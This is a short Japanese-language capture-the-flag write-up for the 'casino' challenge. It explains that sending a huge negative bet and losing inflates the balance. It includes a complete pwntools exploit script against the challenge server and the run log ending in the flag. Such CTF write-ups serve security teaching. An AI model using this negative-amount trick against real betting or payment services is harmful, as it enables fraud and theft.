casino

831

Description

Not really crypto...

Service

192.53.115.129:31338

File

https://drive.google.com/file/d/1UfeHQzvoRhCN1nVMokdviybhc7jozPcN/view?usp=share_link

Author

@ndh

ユーザ登録→Bet→Proof表示→フラグ表示の流れ。
Betでは、0~2023の乱数を当てることができれば掛け金が増えるが、逆に掛け金にマイナス値を与えて間違えることで増やすことができる。
したがって、以下のプログラムを実行するとフラグを得ることができる。

from pwn import *
import argparse
import json
import base64

parser
= argparse.ArgumentParser()
parser.add_argument('--local', action='store_true')
args = parser.parse_args()

context
.log_level = 'debug'
p = remote('192.53.115.129', 31338)

data = dict()
data['Recipient'] = "Casino"
data['Command'] = "Register"
data['Username'] = "aaa"
p.sendline(json.dumps(data))
ret = p.recvline()
print(ret)

data
= dict()
data['Recipient'] = "Casino"
data['Command'] = "ShowBalanceWithProof"
data['Username'] = "aaa"
p.sendline(json.dumps(data))
ret = p.recvline()
print(ret)
ret = ret.split(b',')
balance = int(ret[0].strip())
proof = ret[1].strip()
proofData = base64.b64decode(proof)

data
= dict()
data['Recipient'] = "Casino"
data['Command'] = "Bet"
data['Username'] = "aaa"
data["Amount"] = -99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
data["N"] = 1
p.sendline(json.dumps(data))
ret = p.recvline()
print(ret)

data
= dict()
data['Recipient'] = "Casino"
data['Command'] = "ShowBalanceWithProof"
data['Username'] = "aaa"
p.sendline(json.dumps(data))
ret = p.recvline()
print(ret)
ret = ret.split(b',')
balance = int(ret[0].strip())
proof = ret[1].strip()
proofData = base64.b64decode(proof)

data
= dict()
data['Recipient'] = "FlagSeller"
data['Command'] = "PrintFlag"
data['Username'] = "aaa"
data["Balance"] = balance
data["proof_data"] = proof.decode()
p.sendline(json.dumps(data))
ret = p.recvline()
print(ret)

p
.close()

以下は実行結果。
    b'{"Recipient": "Casino", "Command": "Register", "Username": "aaa"}\n'

    b'Added user: aaa.\n'

    b'{"Recipient": "Casino", "Command": "ShowBalanceWithProof", "Username": "aaa"}\n'

    b'2023, GikKA2FhYRIgQPJb1twwnZ8heEnF0bSrB68jO9RSatr+X608MrQ7cmYYAQ==\n'

    b'{"Recipient": "Casino", "Command": "Bet", "Username": "aaa", "Amount": -99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999, "N": 1}\n'        

    b'YOU LOSE (1566 != 1)! Current balance: 100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002022 (--99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).\n'

    b'{"Recipient": "Casino", "Command": "ShowBalanceWithProof", "Username": "aaa"}\n'
   
    b'10000002022, GikKA2FhYRIgOohZ458ucROd7O1Ws/ZcaRC0y9NA5Xf4+XlNGn9OTkMYAg==\n'

    b'{"Recipient": "FlagSeller", "Command": "PrintFlag", "Username": "aaa", "Balance": 100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002022, "proof_data": "GikKA2FhYRIgJF8T4TuyAYwBc7tMOKcmigommLseeRuY5AFg1FI/WmUYAg=="}\n'

    b'Your flag is: TetCTF{fr0m_n3g4t1v3n3ss_t0_b4nkruptcy}\n'